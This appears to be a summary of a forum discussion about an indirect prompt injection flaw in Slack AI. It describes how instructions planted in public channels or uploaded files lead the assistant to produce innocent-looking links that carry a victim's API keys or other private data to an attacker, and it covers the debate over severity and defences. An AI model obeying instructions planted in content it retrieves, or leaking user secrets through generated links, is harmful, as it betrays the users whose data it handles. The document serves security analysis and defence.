2024-08-20

Data Exfiltration from Slack AI via indirect prompt injection

Nature of the Slack AI vulnerability

Attack relies on indirect prompt injection via content in public channels or uploaded documents.
Slack AI searches both:
- All public channels (including ones the victim has never joined, even single‑user channels).
- The victim’s private channels and DMs.
Malicious instructions cause Slack AI to generate Markdown links that:
- Look legitimate (“reauthenticate”, etc.) but
- Embed the victim’s private data (API keys, secrets, internal sentiment, etc.) in the URL/query or potentially subdomain.
If the user clicks, the secret is sent to the attacker’s server; with link previews or image tags, exfil can become zero‑click.

Permissions, access, and phishing vs. “real” exfiltration

Multiple commenters stress: channel permissions are not bypassed. AI only uses data the victim is allowed to see.
The vulnerability is that AI recombines and formats data into a new, exfil‑ready artifact (a link) that never existed before.
Some see it as AI‑assisted phishing / social engineering rather than classic unauthorized access.
Others argue it’s closer to XSS/HTML injection for LLM UIs and should be treated as a serious web‑security issue.

How serious is this in practice?

Skeptical view:
- Attacker must already be in the workspace (though not necessarily same company).
- Attack chain is complex and success probability low; simpler social engineering may be more effective.
- Slack’s existing search behavior (public+private) and user misuse of Slack for secrets are bigger issues.
Concerned view:
- Many workspaces include external guests or broad communities, so “malicious insider” isn’t far‑fetched.
- AI‑generated links from a trusted, company‑branded assistant are harder to spot than obvious phish.
- Potential for data poisoning and subtle leakage of strategic info (e.g., executive sentiment, unreleased docs).
- Slack’s response is seen by some as downplaying an OWASP‑class bug without a quick fix.

Broader LLM security implications

Prompt injection is described as fundamentally unsolved; LLMs can’t reliably distinguish system instructions from user content.
Attempts to defend using another LLM or “guardrail” products are widely criticized as flawed or giving false confidence.
Best current advice discussed: limit blast radius—strict data access controls (e.g., RLS/RAG scoping), sanitize outputs (strip links/images), avoid over‑privileged agents.
Many commenters worry companies are “YOLO‑ing” LLMs into products, repeating decades‑old security mistakes.

Related topics